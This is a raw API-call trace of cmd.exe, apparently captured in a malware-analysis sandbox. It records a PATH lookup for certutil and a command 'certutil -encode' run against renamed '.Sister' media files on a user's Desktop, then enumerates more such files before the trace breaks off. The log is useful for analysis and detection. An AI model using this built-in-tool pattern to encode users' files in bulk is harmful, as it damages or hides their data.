[0219.073] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0219.073] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0219.073] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0219.073] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0219.073] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0219.073] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0219.073] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0219.073] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0219.073] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0219.073] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0219.073] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0219.073] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0219.073] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0219.073] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0219.073] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0219.073] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0219.073] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0219.073] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0219.074] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0219.074] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0219.074] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0219.074] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0219.074] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0219.074] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0219.074] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0219.074] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0219.074] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0219.074] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0219.074] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0219.074] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0219.074] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0219.074] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0219.074] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0219.074] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0219.074] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0219.074] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0219.074] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0219.074] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0219.074] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0219.074] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0219.074] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0219.074] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0219.074] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0219.074] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0219.074] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0219.074] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0219.074] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0219.074] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0219.075] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0219.075] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0219.075] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0219.075] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0219.075] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0219.075] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0219.075] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0219.075] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0219.075] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0219.075] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0219.075] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0219.075] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0219.075] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0219.075] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0219.075] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0219.075] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0219.075] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0219.075] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0219.075] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0219.075] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0219.075] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0219.075] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0219.075] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0219.075] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0219.075] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0219.075] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0219.075] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0219.075] ??_V@YAXPEAX@Z () returned 0x1 [0219.075] GetProcessHeap () returned 0x21ed8c70000 [0219.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cb7070 [0219.076] GetProcessHeap () returned 0x21ed8c70000 [0219.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c96c40 [0219.076] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0219.076] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0219.076] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0219.076] GetProcessHeap () returned 0x21ed8c70000 [0219.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cc9750 [0219.076] SetErrorMode (uMode=0x0) returned 0x0 [0219.076] SetErrorMode (uMode=0x1) returned 0x0 [0219.076] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cc9760, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0219.076] SetErrorMode (uMode=0x0) returned 0x1 [0219.076] GetProcessHeap () returned 0x21ed8c70000 [0219.076] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9750, Size=0x52) returned 0x21ed8cc9750 [0219.076] GetProcessHeap () returned 0x21ed8c70000 [0219.076] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9750) returned 0x52 [0219.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0219.076] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.076] GetProcessHeap () returned 0x21ed8c70000 [0219.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64690 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d66660 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66660, Size=0x1be) returned 0x21ed8d66660 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66660) returned 0x1be [0219.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d639c0 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d639c0, Size=0x7e) returned 0x21ed8d639c0 [0219.077] GetProcessHeap () returned 0x21ed8c70000 [0219.077] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d639c0) returned 0x7e [0219.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.077] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.077] GetLastError () returned 0x2 [0219.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.078] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.078] GetLastError () returned 0x2 [0219.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.078] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d000 [0219.078] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0219.078] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.078] GetLastError () returned 0x2 [0219.078] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0219.079] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0219.079] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0219.079] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0219.079] ??_V@YAXPEAX@Z () returned 0x1 [0219.079] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0219.149] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0219.149] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0219.149] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0219.149] GetProcessHeap () returned 0x21ed8c70000 [0219.149] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45cb0 [0219.149] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.149] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0219.149] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.149] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.151] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.151] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.151] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.151] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.151] GetProcessHeap () returned 0x21ed8c70000 [0219.151] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0219.151] GetProcessHeap () returned 0x21ed8c70000 [0219.151] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c956e0 [0219.151] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.151] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0219.287] _get_osfhandle (_FileHandle=0) returned 0x4c [0219.287] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0219.361] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1324, dwThreadId=0x1328)) returned 1 [0219.373] CloseHandle (hObject=0xa8) returned 1 [0219.373] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.374] GetProcessHeap () returned 0x21ed8c70000 [0219.374] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0219.374] GetEnvironmentStringsW () returned 0x21ed9980080* [0219.374] GetProcessHeap () returned 0x21ed8c70000 [0219.374] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0219.374] FreeEnvironmentStringsA (penv="=") returned 1 [0219.374] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0219.803] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0219.803] CloseHandle (hObject=0xa4) returned 1 [0219.803] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0219.803] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0219.803] GetProcessHeap () returned 0x21ed8c70000 [0219.803] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0219.803] GetEnvironmentStringsW () returned 0x21ed9980080* [0219.803] GetProcessHeap () returned 0x21ed8c70000 [0219.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0219.804] FreeEnvironmentStringsA (penv="=") returned 1 [0219.804] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0219.804] GetEnvironmentStringsW () returned 0x21ed9980080* [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0219.804] FreeEnvironmentStringsA (penv="=") returned 1 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c956e0) returned 1 [0219.804] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0219.804] ??_V@YAXPEAX@Z () returned 0x1 [0219.804] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="AiNxYR.mp4.Sister", cAlternateFileName="")) returned 1 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980da0, Size=0x1e4) returned 0x21ed9980da0 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980da0) returned 0x1e4 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937acf0 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937acf0, Size=0x58) returned 0x21ed937acf0 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937acf0) returned 0x58 [0219.804] GetProcessHeap () returned 0x21ed8c70000 [0219.804] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937ad60 [0219.804] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0219.805] GetProcessHeap () returned 0x21ed8c70000 [0219.805] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8650 [0219.805] ??_V@YAXPEAX@Z () returned 0x1 [0219.805] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0219.805] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0219.805] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0219.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0219.805] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0219.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xad974d2f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xad974d2f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0219.805] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0219.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AiNxYR.mp4.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ac2b30, ftCreationTime.dwHighDateTime=0x1d5e8ea, ftLastAccessTime.dwLowDateTime=0x46178560, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x46178560, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x1307e, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="AiNxYR.mp4.Sister", cAlternateFileName="AINXYR~1.SIS")) returned 0x21ed8c7d000 [0219.806] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0219.806] _wcsnicmp (_String1="AINXYR~1.SIS", _String2="AiNxYR.mp4.Sister", _MaxCount=0x11) returned 80 [0219.806] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0219.806] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0219.806] GetProcessHeap () returned 0x21ed8c70000 [0219.806] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45e90 [0219.806] ??_V@YAXPEAX@Z () returned 0x1 [0219.806] ??_V@YAXPEAX@Z () returned 0x1 [0219.806] GetProcessHeap () returned 0x21ed8c70000 [0219.806] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ad60, Size=0x190) returned 0x21ed937ad60 [0219.806] GetProcessHeap () returned 0x21ed8c70000 [0219.806] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ad60) returned 0x190 [0219.806] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0219.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.806] GetFileType (hFile=0x50) returned 0x2 [0219.806] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.806] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0219.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.807] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0219.814] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.814] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0219.814] _vsnwprintf (in: _Buffer=0x21ed8e80160, 